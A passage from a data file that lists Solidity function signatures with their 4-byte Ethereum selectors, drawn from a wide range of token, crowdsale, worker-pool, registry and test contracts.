"ownerHasCardSimple(address,address)": "0xd8175101", "ownerHasCard(address,address)": "0x02fac967", "ownerCountOfCard(address,address)": "0xbedc7796", "indexOfCardAddress(address)": "0xdd796b07", "cardAddressExists(address)": "0xb8ef9fcc", "cumulativeIndexOf(uint256[],uint256)": "0x3dae94f0", "querySeed(uint256)": "0x3adb3ad5", "tmpQuerySeed(uint256,uint256)": "0x42ed567c", "shuffleSeed(uint256)": "0x989b595f", "tmpShuffleSeed(uint256,uint256)": "0x04b64260", "getBalanceOfSender()": "0xbe6d91e6", "transferCardTo(address,address)": "0xbcbea1ad", "attemptToClaimCard(address,address[3])": "0xa314acfe", "cancelWagerOfCard(address)": "0x0834ab44", "wagerCardForAmount(address,uint256)": "0x0979f7f2", "enlist()": "0x1a120481", "AddressWarsBeta()": "0x456cbafc", "processMyRefund()": "0x554917f5", "requestForRefund(uint256)": "0xabc1c9fe", "invalidateAdvertiserRefund(uint256)": "0x545d2e29", "refundAdvertiser(address,uint256)": "0x2aadafe8", "chargeAdvertisers(address[],uint256[],address[],uint256[])": "0x960954af", "setPublisherCut(address,uint256)": "0x910887bc", "creditAdvertiser(address)": "0x9b409510", "processRefunds()": "0xa8feda51", "setRefundTimelock(uint256)": "0xdefafa37", "setBitwordsCut(uint256)": "0xd1073bdb", "setBitwordsWithdrawlAddress(address)": "0x670733b5", "approveMigration(uint256)": "0x939b7842", "allowWorkerToContribute(address,address,address)": "0xdc988b40", "allowWorkersToContribute(address,address[],address)": "0x7c609885", "emitWorkOrder(address,uint256)": "0x7919233f", "getContribution(address,address)": "0x126eac43", "existingContribution(address,address)": "0x40f03605", "getContributor(address,uint256)": "0xbb7fb08b", "getContributorsCount(address)": "0x3ec6a4c4", "getConsensusDetails(address)": "0xf4efa24c", "removeWorker(address)": "0xc4f987a5", "unsubscribeFromPool()": "0xe653ec6a", "subscribeToPool()": "0x0c6e29e3", "getWorkersCount()": "0xc6ced32b", "getWorkerIndex(address)": "0xec1847b6", "getWorkerAddress(uint256)": "0x900b7b62", "changeWorkerPoolPolicy(uint256,uint256,uint256,uint256)": "0xef9cb474", "WorkerPool(address,string,uint256,uint256,uint256,address)": "0x16c1df06", "workOrderCallback(address,string,string,string)": "0x514d7067", "IexecHub()": "0x13e8e74b", "unregisterWorkerAffectation(address,address)": "0x0b00de8d", "registerWorkerAffectation(address,address)": "0x1884c517", "createWorkerPool(string,uint256,uint256,uint256,address)": "0x215bd303", "addWorkerPool(address,address)": "0xb538c5ea", "getWorkerAffectation(address)": "0xd440c6f3", "getWorkerPoolByIndex(uint256)": "0xdee3efb2", "getWorkerPool(address,uint256)": "0x01a08a8b", "getWorkerPoolsCount(address)": "0x69bee8a1", "isWorkerPoolRegistered(address)": "0x68c197dd", "WorkerPoolHub()": "0x8add359d", "addDataset(address,address)": "0xbfd90435", "getDatasetByIndex(uint256)": "0x31638ced", "getDataset(address,uint256)": "0x34646163", "getDatasetsCount(address)": "0x2b58072f", "isDatasetRegistred(address)": "0x16265b4e", "DatasetHub()": "0x50669508", "Dataset(address,string,uint256,string)": "0x5915589e", "addApp(address,address)": "0x932a7b2e", "getAppByIndex(uint256)": "0x23797ed9", "getApp(address,uint256)": "0xbaebcaf0", "getAppsCount(address)": "0x3a911d30", "isAppRegistered(address)": "0x8403be91", "AppHub()": "0x6768893c", "App(address,string,uint256,string)": "0xf4325417", "setResult(string,string,string)": "0xd5fdfdbc", "reActivate()": "0x1a514d97", "startRevealingPhase()": "0x2d4d671f", "WorkOrder(uint256,address,address,address,address,uint256,string,address,address)": "0xd4981928", "MarketplaceAccessor(address)": "0x692193cc", "getMarketOrder(uint256)": "0xeb3721be", "getMarketOrderTrust(uint256)": "0x24026bfb", "getMarketOrderCategory(uint256)": "0x4cfddcfb", "getMarketOrderWorkerpoolOwner(uint256)": "0x55d66c3e", "getMarketOrderValue(uint256)": "0x38c4090b", "closeMarketOrder(uint256)": "0x60f75f3b", "IexecHubAccessor(address)": "0xfc74f55c", "unlock(address,uint256)": "0x7eee288d", "lock(address,uint256)": "0x282d3fdf", "seize(address,uint256)": "0xeb9253c0", "reward(address,uint256)": "0x21670f22", "seizeForWork(address,address,uint256,bool)": "0x9fdf9625", "rewardForWork(address,address,uint256,bool)": "0x0c91f2d0", "unlockForWork(address,address,uint256)": "0x6b4f6865", "lockForWork(address,address,uint256)": "0x8981d077", "unlockForOrder(address,uint256)": "0xb7b6e978", "lockForOrder(address,uint256)": "0xac26109e", "removeWorker(address,address)": "0xbe0e9d75", "evictWorker(address)": "0x835436b4", "unregisterFromPool(address)": "0x1708d725", "registerToPool(address)": "0xb218cf15", "getWorkerScore(address)": "0x8c0f8e11", "getWorkerStatus(address)": "0xf69f190c", "getCategory(uint256)": "0xf3052d26", "existingCategory(uint256)": "0x32baa8d9", "getCategoryWorkClockTimeRef(uint256)": "0x1f871726", "finalizeWorkOrder(address,string,string,string)": "0xb6b57ebd", "claimFailedConsensus(address)": "0x89869163", "isWoidRegistred(address)": "0x32ca5587", "buyForWorkOrder(uint256,address,address,address,string,address,address)": "0x536e2800", "createDataset(string,uint256,string)": "0x39b73122", "createApp(string,uint256,string)": "0xfc06a877", "createWorkerPool(string,uint256,uint256,uint256)": "0x66de5a4f", "createCategory(string,string,uint256)": "0x298503d9", "setCategoriesCreator(address)": "0x0800b89e", "attachContracts(address,address,address,address,address)": "0xe760a11a", "setImmutableOwnership(address)": "0xbbac78a9", "OwnableOZ()": "0x838006c0", "log(uint256)": "0xf82c50f1", "percentage(uint256,uint256)": "0x016eb8a8", "setComment(uint256,bytes3,string)": "0x9c1b987c", "addComment(bytes3,string)": "0x1c3a36d0", "getNote(uint256)": "0xa965a941", "setNote(uint256,bytes32,string)": "0xb9f696d5", "addNote(bytes32,string)": "0x8d505019", "constuctor()": "0xdfe4858a", "StoToken(address,address)": "0xfd186de6", "decreaseApprovalAndCall(address,uint256,bytes)": "0xcb3993be", "increaseApprovalAndCall(address,uint256,bytes)": "0x90db623f", "transferFromAndCall(address,address,uint256,bytes)": "0xc1d34b89", "getScoreAndCount(address)": "0xab413a7e", "getScore(address)": "0xd47875d0", "rate(address,int256)": "0xe7e3e167", "requestUnclaimed()": "0x316f2f06", "pre_startdate()": "0x64e8d682", "firstAuctionsHighestBid()": "0x72a22014", "changeBurnBoundsOperation()": "0x6a7245ef", "STARTING_HIPSTER()": "0x57af3eec", "badgeUnFreeze()": "0xf52ad690", "ratioUpdateTime()": "0x4c7b18fd", "timerStart()": "0xde5e21df", "tokensMintedForOperations()": "0x9af75b29", "toPool()": "0xe124f899", "burnedTokensCount()": "0x5104a3a7", "TOKENS_AVAILABLE()": "0x062fe08e", "secondRoundMayDiscount()": "0x277ad5d8", "lastUnlockMineBalanceTime()": "0x186ba9de", "preMinedFund()": "0x813df488", "nextBidExpireBlockLength()": "0x14468d32", "PRICE_10()": "0xb725d84f", "totalSharePool()": "0xa9b86292", "purchaseCardinal()": "0x832a66a2", "betBlueCoin()": "0xf1d71b73", "durationOfStatusSell()": "0x13d5f1fe", "TotalFeesReceived()": "0x3ed8ff25", "highestBidTime()": "0x52ffeb30", "getTotalBrags()": "0x8925d7bb", "goalIncrement()": "0x3f738402", "totalDistributedinWei()": "0xc67f3e1f", "incentivisingEffortsAddress()": "0x808f4d21", "tokenConversionFactor()": "0x53105fbc", "owner_address()": "0x80edef8e", "voteCut()": "0x47115192", "stageTwoClosed()": "0x77f41164", "preMaxContribution()": "0x451b5f47", "pendingCount()": "0xea70b4af", "weiPreCollected()": "0x0b972ff6", "MAX_BOUNTY_SUPPLY()": "0xfb2f3a8a", "mineableTokenStorageContract()": "0x00dba80c", "POST_ICO()": "0x1b25d0e6", "nextUserId()": "0xa1e6a255", "_icoSupply()": "0x3c50afe1", "RESERVED_TOKENS_FOR_PLATFORM_OPERATIONS()": "0x007cc224", "buyIssuerTokens()": "0x42f98b14", "holderPartnershipsTokens()": "0xd7a5afcf", "keyLocked()": "0xed953b69", "numberOfTokensToAvail50PercentDiscount()": "0x387349fc", "releasedTokens()": "0xbef39963", "CERTIFIER()": "0xb86bc74f", "endTime2()": "0x691c71bd", "PRESALE_WEI_GOAL()": "0xf69f1027", "requiredLockedForColorRegistration()": "0x086b8331", "bancorConverterAddress()": "0x1e63b3d3", "ONE_BILLION()": "0x5d12fc0c", "ADVISOR_STAKE_ONE()": "0x6896a342", "icoDeadLine()": "0x6d643308", "tvc()": "0xf23b872e", "donors()": "0x3087110a", "mainstreetCrowdfund()": "0xdecadbcc", "getProjectCount()": "0x3bcff3b0", "PRE_ICO_TIER_FIRST()": "0x13b499ce", "firstRoundStartTimestamp()": "0xff2263b7", "PRICE_CHANGE_ENDING_TIME()": "0xec6e43ae", "ownerMintAmount()": "0xbb00c8f9", "masterWallet()": "0xfc0d0117", "buyingEscrowAddress()": "0x9b1b0ab3", "affiliateProgramWalletAddress()": "0x63ae71ca", "promoMasterpiecesCreatedCount()": "0xcb9a32a5", "EndTime()": "0x33360978", "PRICE_FACTOR()": "0xcd6d7f81", "loser()": "0xe82898b3", "jackpotTokenEthRate()": "0xf945b274", "_medalTotalSupply()": "0x11df19f7", "refferBonus()": "0x46df1578", "PLATINUM_AMOUNT_SKL()": "0x8395aa94", "stateController()": "0xbf632e67", "ADMIN_ROLE()": "0x75b238fc", "reserveAdress()": "0xf602e325", "voting()": "0xfce1ccca", "gasForOraclizedQuery()": "0x13a931dc", "bonus2StartETH()": "0xe4b6ac4c", "MINT_CAP()": "0x98f1312e", "unclaimedRoyalty()": "0xf751b26a", "aloha()": "0x1c484766", "cofoundersSupplyRemaining()": "0x00de1eb4", "startTransferTime()": "0x840e2673", "fullfillTeamAddress()": "0x1d0cc1e7", "_commission()": "0xf0207fb1", "totalTiers()": "0x79eaaf61", "lastMinedOn()": "0xadfaae32", "icoEtherReceivedMainSaleDay()": "0x96e4f67d", "isPREICO()": "0x5e3d3b8a", "DEVELOP_CAP()": "0xcad916ec", "withdrew()": "0xec8f850b", "allowedToSell()": "0x6d6d69b6", "Enabled()": "0xc0f96105", "getInitialState()": "0x6d98ee4e", "capital()": "0xd211fd18", "tixFund()": "0x60577043", "crosairSoldCount()": "0x7a14f465", "ieoStorageVault()": "0x0b611241", "ToOwner()": "0xb21287ae", "sanityBounds()": "0xa489a2c7", "addSpendingRequest(address)": "0xd1feca67", "addSignature(uint256,bytes16,bytes)": "0x3e82055a", "addRegistryIntoTagsIndex(address)": "0x7cdbae63", "addRegistryIntoOwnerIndex(address,address)": "0xb796a339", "addRegistryIntoNameIndex(address)": "0x49bf66d3", "addPowerSource(address,uint256,uint256)": "0x3d90d44d", "_addPools(address,address)": "0x3c0dde1c", "addOracle(address)": "0xdf5dd1a5", "addOption(string,address,uint256)": "0x227f9633", "addOptionChain(uint256,string,uint256,uint256,bytes32,address,int256[])": "0x7d380265", "addNode(bytes32,address)": "0x76849376", "addNewUser(address)": "0xc1d5e84f", "AddNewSmallContract(address)": "0x755f99c2", "addNewProxy(address)": "0x74bfb965", "addNewDonkey(address)": "0x29dfdded", "AddNewCategory(bytes4,uint8,uint8,address)": "0x2ba0b09f", "addManager(address)": "0x2d06177a", "addIssueBounty(string,uint256)": "0x2fe9541f", "addInvestorsValue(uint256)": "0x202d6eaf", "addInvestorAtID(uint256)": "0xf824384a", "addInstitution(address,string)": "0x17e1bfb7", "_addIdentities(uint256,bytes32[])": "0x17b3a34b", "addIdentities(bytes32[],bytes32[])": "0x61bffe01", "addGridMember(address)": "0x20339891", "addDoc(string,string)": "0xd3118a5a", "addDataRequest(string)": "0x4094ef5e", "addDataPoint(int256,uint256,bool,string)": "0x6ac6205c", "addCharityFundation(string,string,string)": "0x9450b1c8", "addChainyData(string)": "0xac3e7d24", "addCertifier(address)": "0x2b198366", "addCertificationDocumentToSelf(bytes32)": "0xe80bd3e5", "addCertificationDocumentInternal(address,bytes32)": "0xa0d605c6", "addCertificationDocument(address,bytes32)": "0xec97cff7", "add(address,bytes)": "0x0b2acb3f", "activate(string)": "0x1917ab5c", "activateMasterKey(address)": "0xcf03f5f4", "activateImportFeeChargeRecord(address)": "0x1d2b7155", "activateFrozenAccount(address)": "0xd532e481", "activateExportFeeChargeRecord(address)": "0x2cd78450", "activateExportFee(address)": "0xc8e49707", "activateBalance(address)": "0x0651844e", "activateAllowanceRecord(address,address)": "0x6bd92f7c", "activateAllowance(address,address)": "0x1e9fcc77", "activateAccount(address)": "0x82a62137", "ack(string)": "0x7ec0f30d", "ackMsg(uint256,string)": "0xa8b60b93", "accessOperatingBudget(uint256)": "0x5a28340a", "acceptTradeDeal()": "0xa79deb4f", "acceptTOS(address,bool)": "0x8f5e9ca7", "accept(string,uint256,uint16)": "0xbdfdb519", "acceptBankDraft()": "0x9b0b9c07", "abdicate()": "0x314e99a2", "A()": "0xf446c1d0", "tokenCount()": "0x9f181b5e", "getAccountSize(address,uint256)": "0x048e2e94", "getChannelSize(address,uint256)": "0xbac1e9f6", "getContents(uint256[],uint256)": "0x49e347ae", "getContentReplies(uint256,uint256)": "0xd90a88cd", "getAccountFeed(address,uint256,uint256,uint256)": "0x05a17fc6", "getChannelFeed(address,uint256,uint256,uint256)": "0xe9e99d81", "claimEther()": "0x55291dbd", "getEtherBalance()": "0xea46193e", "Fund()": "0x6ce1417e", "toContentID(address,string,string,address,uint256)": "0x4c8cc20b", "publish(string,string,address,uint256)": "0xe3579ea5", "Post(address)": "0x2a45a39a", "getContents(uint256[])": "0xb3822da8", "getContentReplies(uint256)": "0xbff974e8", "getAccountFeed(address,uint256,uint256)": "0xdd90c403", "getChannelFeed(address,uint256,uint256)": "0x27fbcac5", "Read(address)": "0x79be02af", "getAccountTokenBalance(address,address)": "0x0fcda174", "getAccountFundContract(address)": "0x0a7f4239", "getAccountContentTip(address,uint256)": "0x73f93a48", "getAccountSize(address)": "0x2ca6d2c0", "getChannelSize(address)": "0x47372325", "getReplyCount(uint256)": "0xda9c6a46", "getContent(uint256)": "0x0b7ad54c", "updateChannelMinimum(address,uint256)": "0xfad4b99a", "updatePublishContract(address)": "0x6ebbe863", "withdrawAccountBalance(address)": "0x33397816", "createAccountFundContract()": "0x96c824a8", "tip(uint256,address,uint256)": "0xfb279ef3", "publish(address,uint256,address,uint256)": "0xdd114c22", "Feed()": "0x20d8741f", "setName(bytes32,string)": "0x77372213", "name(bytes32)": "0x691f3431", "setPubkey(bytes32,bytes32,bytes32)": "0x29cd62ea", "pubkey(bytes32)": "0xc8690233", "setABI(bytes32,uint256,bytes)": "0x623195b0", "ABI(bytes32,uint256)": "0x2203ab56", "previousOwner()": "0x674f220f", "value()": "0x3fa4f245", "registrar()": "0x2b20e397", "creationDate()": "0x05b34410", "acceptRegistrarTransfer(bytes32,address,uint256)": "0xea9e107a", "registryStarted()": "0x9c67f06f", "sealedBids(address,bytes32)": "0x5e431709", "_tryEraseSingleNode(bytes32)": "0x29cd5777", "trySetSubnodeOwner(bytes32,address)": "0x8e7fd292", "addGlobalConstraint(int256,address,int256,bytes32,address)": "0x98a33bfe", "isGlobalConstraintRegistered(int256,address,int256,address)": "0xd9134c46", "globalConstraintsCount(address)": "0x824f2f1f", "getSchemePermissions(address,address)": "0x9b51e35a", "getSchemeParameters(address,address)": "0x1c4d5608", "isSchemeRegistered(address,address)": "0x9be2faed", "unregisterSelf(address)": "0x6c525b13", "unregisterScheme(address,address)": "0x039de01d", "registerScheme(address,bytes32,bytes4,address)": "0xe869d45f", "mintTokens(int256,uint256,address,address)": "0x2c3d38f0", "burnReputation(uint256,address,address)": "0x6e94d278", "mintReputation(int256,uint256,address,address)": "0x95709441", "UController()": "0x7003ce6f", "queryTinyOracle(bytes)": "0x721868f8", "query(bytes)": "0xed815d83", "decodeTransfer(bytes)": "0xdc02f456", "lenghtenFrozenState(uint256,uint256)": "0x1138001c", "create(uint256,uint256)": "0x9f7b4579", "amount(uint256)": "0x8b0d0258", "remainingTime(uint256)": "0x0c64a7f2", "isExist(uint256)": "0xca8f8ff3", "FrozenEther()": "0x4276d082", "getCash()": "0x3b1d21a2", "PayableContract()": "0x02e6a951", "getWalletBalance()": "0x329a27e7", "testSign2of3()": "0x38ef2dc0", "initWallet2of3()": "0xb50c77f2", "FooWallet(address[],uint256)": "0xb18e0ab8", "updatePosition(address,int256,uint256)": "0x39b0b6c2", "withdrawCollateralFromPool(address,uint256)": "0xf2d68ee0", "commitCollateralToPool(address,uint256)": "0xab2643a1", "withdrawTokens(uint256)": "0x315a095d", "updatePositions(address,address,int256,uint256)": "0xeeaba083", "settleAndClose()": "0x3bc6db30", "depositTokensForTrading(uint256)": "0xa68e5ad0", "getUserAccountBalance(address)": "0x3f7f4f17", "getUserPosition(address)": "0x5b7c2dad", "MarketCollateralPool(address)": "0x86d263fe", "addDataPoint(int256,uint256,bytes32)": "0x8521b59c", "addSubject(bytes32)": "0x0e6e1b3e", "getDataPointForSubject(int256,uint256,uint256,int256)": "0x7423e225", "getSubjectIdentById(uint256)": "0x6207c802", "getDataCounterForSubject(uint256)": "0x2c420201", "getSubjectById(uint256)": "0x4d392e49", "getSubjectsCount()": "0x9f73bef1", "ClinicalTrial(address,address,uint256,uint256,uint256,bytes32,bytes)": "0xed5eafa2", "MaliciousSeller()": "0x14d23c8b", "onNewCampaign(uint256,address)": "0x3a91db97", "create(string,string,string,address)": "0x82cbdc0f", "withdraw_for(address)": "0x4c3b67b4", "set_parameters(uint256,uint256,uint256)": "0x90b22d03", "set_manager(address)": "0x9aece83e", "minimum_balance()": "0x01c24a90", "Faucet(address)": "0x7ef92867", "interpolate(uint256,uint256,uint256,uint256,uint256)": "0xd0610ac9", "eucledianDistance(uint256,uint256,uint256,uint256)": "0xe6a7638c", "GxAuth()": "0x11eb6d4b", "test_me(int256)": "0xcc2761a4", "addValidation()": "0x84394e6f", "LocalsValidation()": "0xe521357c", "setMultiSigWallet(address)": "0xf03b0c0b", "RefundPeriodStart()": "0x82dc87b6", "RefundPeriodOver()": "0x4e01bb60", "getRok()": "0x3d7646f7", "checkEthSold()": "0x58bb7d70", "setSavedBalance(uint256)": "0x32fbe8d3", "setSavedBalanceToken(uint256)": "0x8671090e", "setRokBalance(address,uint256)": "0x2318ffc7", "checkRokBalance(address)": "0x9c7e6e6e", "setSavedEthBalance(address,uint256)": "0x6d8a9f92", "setEthBalance(address,uint256)": "0xec559176", "setTokenBalance(address,address,uint256)": "0x060dac88", "tokenBalance(address,address)": "0x1049334f", "getAccountAddress(address)": "0x5872fe45", "getInitTime(uint256)": "0x6e5aef4d", "throwMe()": "0xbb75a2a9", "getI2()": "0xfae6edcf", "getEnumValue()": "0x48593bae", "myMethod3(string)": "0xb1c23704", "myMethod2(string)": "0x96386ab3", "myMethod(string)": "0x2bf435f9", "myContract2()": "0xf68445dd", "bytesToUint(bytes,int256,bytes)": "0x52ceac34", "PaymentChannel(address,address,address,address,uint256,bytes)": "0x07885cd1", "isAcceptedToken(address)": "0x3b6e750f", "getLicensePrice()": "0x1af62808", "getLicensePrice(address)": "0x1b7c058e", "holdsValidLicense(address)": "0xfa11c471", "getLicenseReimbursement()": "0x75ada3d3", "getLicenseReimbursement(address)": "0x4497ce22", "removeAcceptedToken(address)": "0xd8134a23", "addAcceptedToken(address,uint256,uint256)": "0x3f9d95ed", "sellLicense()": "0x79968b77", "buyLicenseForETH()": "0xb0fa4926", "buyLicenseForERC20(address)": "0x8e273ef4", "PostLicense()": "0xa7b69ed9", "shutDownVersion(uint256)": "0x15142ed4", "addVersion(address)": "0x11cdf27a", "getVersionById(uint256)": "0x7e59092e", "triggerShutdown(uint256)": "0xaa351cf5", "setupTreasury(address,uint256)": "0x3f2f1596", "setFee(uint256,uint256,uint256)": "0x5b65b9ab", "setFeeAddr(address)": "0xb2855b4f", "recoverAccount(address,address)": "0xc71cbcf3", "transferPool(address,address,uint256)": "0xaa64c43b", "batchTransfer(address[],uint256[])": "0x88d695b2", "issueCoin(address,uint256,uint256)": "0x63f80de3", "calculateFee(uint256)": "0x99a5d747", "_setFeeStructure(uint256,uint256,uint256)": "0x9b9d0364", "_db()": "0x4a606c53", "Elcoin()": "0x444dd6f3", "remove()": "0xa7f43779", "setAmbiAddress(address,bytes)": "0x5184ffc9", "unapprove(address)": "0xfbf1f78a", "rewardTo(address,uint256)": "0xf8b71c64", "transfer(address,address)": "0xba45b0b8", "hasRelation(bytes,bytes,address)": "0xca3b5c91", "addNode(bytes,address)": "0x7bfaad96", "getNodeAddress(bytes)": "0x3b343a13", "withdraw(address,uint256,bytes,uint256)": "0x9483e91a", "deposit(address,uint256,bytes,uint256)": "0xf3125a1f", "setCaller(address)": "0xbeb92f55", "getCaller()": "0xab470f05", "getOwner()": "0x893d20e8", "ElcoinDb(address)": "0x9bb01b5f", "CrowdFund(uint256,uint256,address)": "0xf004b12b", "addressOf(address,bytes)": "0x034cb28e", "register(bytes)": "0x82fbdc9c", "getAddress(bytes)": "0xc47cf5de", "nameOf(address)": "0xf5c57382", "unregister()": "0xe79a198f", "NameReg()": "0x1c4e6cd0", "getName(address)": "0x5fd4b08a", "unregister(uint256)": "0xa02b161e", "register(uint256,address)": "0xdbbdf083", "fibonacci(uint256)": "0x61047ff4", "ackermann(uint256,uint256)": "0x2839e928", "fireEventLog4Anonym()": "0x9dc2c8f5", "fireEventLog4()": "0xfd408767", "fireEventLog3Anonym()": "0xe8beef5b", "fireEventLog3()": "0xf38b0600", "fireEventLog2Anonym()": "0x76bc21d9", "fireEventLog2()": "0x102accc1", "fireEventLog1Anonym()": "0x4e7ad367", "fireEventLog1()": "0xb61c0503", "fireEventLog0Anonym()": "0xa6780857", "fireEventLog0()": "0x65538c73", "getBytes32()": "0x1f903037", "getUint256(int256)": "0xed180443", "getInt256()": "0xf5b53e17", "getUint8(int8)": "0x4a41e045", "getInt8()": "0x57cb2fc4", "getBool()": "0x12a7b914", "setBytes32(bytes,bytes)": "0x6cc5fdaa", "setUint256(int256,uint256)": "0xec21a913", "setInt256(int256)": "0xa53b1c1e", "setUint8(int8,uint8)": "0x4dfd1b02", "setInt8(int8)": "0x9a19a953", "setBool(bool)": "0x1e26fd33", "JSON_Test()": "0x905e6e42", "GreeterA(bytes)": "0x9c1193ea", "getData()": "0x3bc5de30", "GreeterB(bytes)": "0xf5c98aff", "strConcat(string,string,string)": "0x4112987c", "strConcat(string,string,string,string)": "0x45e965cd", "strConcat(string,string,string,string,string)": "0x95978868", "getCodeSize(address)": "0xb51c4f96", "greet()": "0xcfae3217", "greeter(string)": "0xfaf27bca", "mortal()": "0xf1eae25c", "revealAndPayout(bytes,bytes)": "0xc535165f", "recoverLostFunds()": "0xa59d6986", "sha3clone(bytes)": "0xe8223468", "getTimeElapsed()": "0x4faa2d54", "adminWithdraw()": "0xf18d20be", "TheLuckyOne(bytes)": "0xc6e1c178", "sendGreeting(address,string)": "0xc633084f", "numMessages()": "0x0f4cf692", "greet(string)": "0xead710c4", "World()": "0x2d67bb91", "Tile(int256,int256)": "0x37b7bf11", "Player(string)": "0x553cc48d", "repeat()": "0x7429c086", "scheduleSetIt(uint256,uint256)": "0x245a03ec", "scheduleUndoIt(uint256)": "0xd6b44859", "scheduleDoIt(uint256)": "0x22beb9b9", "setIt(uint256)": "0xdd012a15", "undoIt()": "0x185061da", "doIt()": "0xb29f0835", "AlarmTester(address)": "0xe1bedf2a", "seven()": "0x78710d37", "test()": "0xf8a8fd6d", "multiply(uint256)": "0xc6888fa1", "B()": "0x32e7c5bf", "Owned()": "0xb303dcbd", "query1_withGasLimit(uint256,string,string,uint256)": "0x75700437", "query2(uint256,string,string,string,uint256)": "0x7e1c4205", "query1(uint256,string,string,uint256)": "0x5c242c59", "query(uint256,string,string,uint256)": "0xae815843", "query1(uint256,string,string)": "0x23dc42e7", "sampleRegistry()": "0x0b6b80b2", "PRE_SALE_MIN_ETHER()": "0xd5b61da0", "ringIndex()": "0x41ffbc1f", "MICRODOLLARS_PER_DOLLAR()": "0x6fa65c4f", "referralRateInviter()": "0xdbce1ff7", "lastBonusMultiplier()": "0x8aae45be", "vesting2Withdrawn()": "0x717fecea", "finalTimeout()": "0xaefaacda", "ROLE_SUPERUSER()": "0xebb4f484", "insurer()": "0xdbc837c5", "bonusDistributionAddress()": "0x54e030b7", "VIBETPerEther()": "0xa3e298d1", "adminCharge_p2()": "0x0fd62f57", "post()": "0x05c1f502", "isPreSaleTokenSet()": "0xdc0c7735", "gameExpirationTime()": "0xf99d948f", "timeRangeCreateGen0()": "0x3c9ff012", "Icoends()": "0xc3663271", "initialMartialTimes()": "0x403d8a6a", "claimPresaleTokens()": "0x12a4b899", "PARTNER_SALES()": "0xee2c4fec", "manualState()": "0xc9b86d43", "congratulationFromNoel()": "0x26073003", "shopTome()": "0x578f9658", "tokenHolderAddress()": "0x35359a3f", "cratesSold()": "0x115f6795", "cap_nuru()": "0xf862f6f4", "sampleStorage()": "0x8872c68a", "SCHEMA_HASH()": "0x2398b8fc", "unfreeze_start_date()": "0x8a1129f1", "inflationCompBPS()": "0x8031233c", "priorityWallet()": "0xf98d28bb", "minBuyRateInPrecision()": "0xfbe3462c", "canIBuy()": "0xdf2dfb20", "securityGuardLastCheckin()": "0x3f487b8b", "luck()": "0x5d1c3171", "coinprice()": "0x60900c88", "collectMyReturn()": "0x56a3f4ef", "TOKEN_DECIMALS_UINT8()": "0xcf3b1967", "referralBonus()": "0xce7842f5", "course()": "0xdcf63591", "getMinimumFundsInEuroCents()": "0x54f7b493", "metadataSize()": "0x16708bc6", "walletG()": "0x87cf7768", "totle()": "0xaeb89f14", "mToken()": "0xc3b6f939", "_totalXT()": "0x3ff1d68f", "WALLET_ECOSYSTEM()": "0x72aa18d7", "minReferAmount()": "0xecaf76b8", "LSEscrowContract()": "0x495b3bcc", "addRound()": "0xf3e41a99", "isSuccess()": "0x0b6c754b", "Token_ExchangeValue()": "0x51ba24c7", "PLATFORM_FEE_PER_10000()": "0xe3d0799c", "PRESALE_BONUS()": "0x1b3fddb8", "tokensPerCentsWeekOne()": "0x08ee7325", "tokensMinted()": "0x6de9f32b", "accPartner()": "0x13d5ee74", "TrustlessTransaction_Protection_Seconds()": "0x305bcfab", "priceTLP2()": "0xdc1cb47b", "Total_Savers()": "0xf68975a9", "airdropActive()": "0x9843eae3", "KilledTillNow()": "0xc2dc0470", "freeTokens()": "0x6fe8f9c5", "Interest_Rate()": "0xd40e35da", "usdRate()": "0x79b37a86", "_endOfICO()": "0xb720a274", "blockdif()": "0xc109e024", "helper()": "0x63b0e66a", "saleExchangeRate3()": "0xc9cbf8c9", "weeklength()": "0x28e5617e", "maxDividendDepth()": "0x8b018bca", "LEGAL_EXPENSES_ADDR()": "0xfcb899d7", "isShutDown()": "0xff947525", "coinToBurn()": "0x93904aae", "icoRound3()": "0xc45250c8", "callbackGas()": "0xa10132ad", "releasedTeamTokens()": "0xaa534161", "free_transfer()": "0x47f710a7", "minimumAmount()": "0xbb0c8298", "MAX_ETHER_CONTR()": "0x3fb326ba", "presaleOngoing()": "0xb1936c24", "refundedWei()": "0x46d24cbb", "minimumWithdraw()": "0x69c87817", "curPayoutId()": "0x3dce1ea9", "tokenTransferProxy()": "0x0eefdbad", "KWHTokenAddress()": "0x0b6ebf86", "TEAM_ADVISORS_SHARE()": "0xb837433c", "takeAllNotClaimedForRefundMoney()": "0x3cc86b9a", "priceValidSeconds()": "0x6e6ed399", "crowdSaleaddress()": "0xd725a9f0", "minimalWeiTLP1()": "0xfe6e0441", "AIR_1()": "0xefae0f2f", "MinInvestment()": "0xa2a140f9", "fifty_two_weeks()": "0x6e15266a", "ICO_Supply()": "0x8ed9fd75", "failure()": "0x76ffb887", "BLS_TOTAL_CAP()": "0xeb1ebd93", "saleAuctionERC20()": "0x88524780", "bountyTokenSupply()": "0x66273fc6", "test_set_get_RiskParameters()": "0xd647e2da", "test_initialize()": "0x8327a313", "JavaOwnerExample()": "0xb431da0c", "relay(address)": "0x73b6656f", "recieve()": "0xa9e10bf2", "ExampleToken(uint256)": "0xbddd0abd", "setNumber(uint256)": "0x3fb5c1cb", "returnLast()": "0x0fbe3e40", "returnStateChange()": "0x02c1ecbf", "throwIfLocked()": "0xeffc4c1f", "isInState()": "0x35cc2d80", "changeLocked(bool)": "0x9a0ca07d", "contractData()": "0x3cca2420", "ContractExample(string)": "0x770cde1b", "raiseEvent2()": "0x0d0d7dc9", "addStruct1(string)": "0xa90a4ac2", "addStruct(uint256,string)": "0x8bb9fe58", "raiseEvent(string)": "0x1d2d9b06", "addPaper(address)": "0xf9d53ac8", "createPaper(string,uint256,uint256)": "0x2d9c3052", "editorSignUp(address)": "0x328175cd", "authorSignUp(address)": "0x6cfc4512", "addPrecommitment(address,uint256,uint256)": "0x93e4bf4f", "addToWhitelist(address[],uint256[])": "0xf8d50542", "GazeCoinCrowdsale()": "0xff3adc83", "multiMint(int256,address[],uint256[])": "0xead3c2cf", "GazeCoin()": "0x8968db88", "voteCount(uint8,uint8,uint8)": "0x9ede7a37", "voteFor(uint8,uint8,uint8)": "0xd32ab21d", "DemocraticPalette()": "0x547c8011", "updatePalette(uint8,uint8,uint8,uint256)": "0x8b20468b", "colourID(uint8,uint8,uint8)": "0x0c717036", "registerUser()": "0x4d3820eb", "newGoal(bytes)": "0xd13091ed", "fundsAreAvailable()": "0x7ce645a6", "KudosTokenLockup(address,address)": "0x08447aef", "find_and_or_register_user(address,address)": "0xea21c6be", "upgrade_node(address,address,string)": "0xd4dd707f", "upgrade_self(address)": "0xaf54e324", "register_node(string)": "0xb522739a", "count_users()": "0xf7a9a152", "count_nodes()": "0xcd619681", "is_current()": "0x00ba092c", "look_for_node(address)": "0xa52ef9b0", "Nodelist()": "0x0f3afeec", "TestERC20Token(string,string,uint8)": "0x59869576", 